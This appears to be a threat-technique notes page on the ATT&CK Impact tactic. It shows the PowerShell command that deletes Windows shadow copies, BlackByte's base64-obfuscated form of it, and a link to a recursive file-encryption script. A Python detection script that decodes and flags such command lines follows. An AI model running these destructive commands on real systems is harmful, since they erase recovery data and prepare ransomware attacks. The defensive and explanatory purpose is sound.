Impact
The adversary is trying to manipulate, interrupt, or destroy your systems and data. https://attack.mitre.org/tactics/TA0040/
Remove Volume Shadow Copies
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
This TTP is associated with the BlackByte threat actor, which executes the command above as a base64-encoded (UTF-16LE) PowerShell payload:
powershell.exe $x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x
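As an added example (not part of the original page), here is a small Python triage script a defender could run over process-creation command lines. It rebuilds '+'-joined base64 literals and -EncodedCommand arguments, decodes them as UTF-16LE (the encoding [System.Text.Encoding]::Unicode uses), and flags the shadow-copy deletion pattern shown above together with the common vssadmin and wmic variants. The sample events are constructed; the BlackByte-style line is rebuilt from the plaintext command rather than copied.

```python
"""Flag Volume Shadow Copy deletion hidden in encoded PowerShell command lines.

Added example, not code from the original page; all sample events are constructed.
"""
import base64
import re

# Plaintext command from the page, used to rebuild the constructed sample event.
PAGE_COMMAND = "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"

# Indicators of shadow-copy removal: the WMI form on the page plus common CLI variants.
SHADOW_DELETE_PATTERNS = [
    re.compile(r"Win32_Shadowcopy.*?\.Delete\(\)", re.IGNORECASE | re.DOTALL),
    re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.IGNORECASE),
    re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.IGNORECASE),
]

# 'a'+'b' literal concatenation, as used to split the blob on the page.
CONCAT = re.compile(r"'\s*\+\s*'")
# Quoted base64 literals long enough to carry a command.
B64_LITERAL = re.compile(r"'([A-Za-z0-9+/=]{16,})'")
# -e / -ec / -en / -enc / -EncodedCommand (PowerShell accepts any unambiguous prefix;
# these are the common spellings).
ENCODED_ARG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def build_split_literal(text, chunk=36):
    """Constructed helper: encode text as UTF-16LE base64 and split it into
    '+'-joined PowerShell string literals, mirroring the obfuscation on the page."""
    b64 = base64.b64encode(text.encode("utf-16-le")).decode()
    return "+".join(f"'{b64[i:i + chunk]}'" for i in range(0, len(b64), chunk))


def decode_embedded_base64(cmdline):
    """Return every UTF-16LE string recoverable from base64 in the command line.
    Blobs that are not valid base64 or not valid UTF-16LE are skipped."""
    joined = CONCAT.sub("", cmdline)  # glue the split literals back together
    blobs = B64_LITERAL.findall(joined) + ENCODED_ARG.findall(joined)
    decoded = []
    for blob in blobs:
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def detect_shadow_copy_deletion(cmdline):
    """Return (suspicious, decoded_payloads); both the raw line and every decoded
    payload are checked against the indicator patterns."""
    decoded = decode_embedded_base64(cmdline)
    candidates = [cmdline] + decoded
    suspicious = any(p.search(c) for c in candidates for p in SHADOW_DELETE_PATTERNS)
    return suspicious, decoded


# Constructed sample process-creation command lines.
SAMPLE_EVENTS = [
    # BlackByte-style: the page's command, base64-encoded and split across literals.
    "powershell.exe $x = [System.Text.Encoding]::Unicode.GetString("
    "[System.Convert]::FromBase64String(" + build_split_literal(PAGE_COMMAND) + "));"
    "Invoke-Expression $x",
    # Plaintext CLI variant.
    "cmd.exe /c vssadmin.exe delete shadows /all /quiet",
    # Benign encoded command (Get-Date) to show the decoder does not over-alert.
    "powershell.exe -enc " + base64.b64encode("Get-Date".encode("utf-16-le")).decode(),
    # Benign line with an -E... switch that is not -EncodedCommand.
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]


def scan(events):
    """Return the subset of events flagged as shadow-copy deletion, with decoded payloads."""
    return [(e, d) for e in events for s, d in [detect_shadow_copy_deletion(e)] if s]


if __name__ == "__main__":
    for event, payloads in scan(SAMPLE_EVENTS):
        print("ALERT:", event[:60], "...", "decoded:", payloads)
```

The decoder deliberately checks the raw line as well as each decoded payload, so a plaintext vssadmin call and an obfuscated WMI call trigger the same rule; in production the patterns would feed a SIEM rule over Sysmon Event ID 1 or Windows 4688 command lines rather than a static list.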
PowerShell Encryption Routine
A trivial example of encrypting files recursively with a random integer as the key:
https://github.com/burmat/burmatscripts/blob/master/powershell/AES-Locker.ps1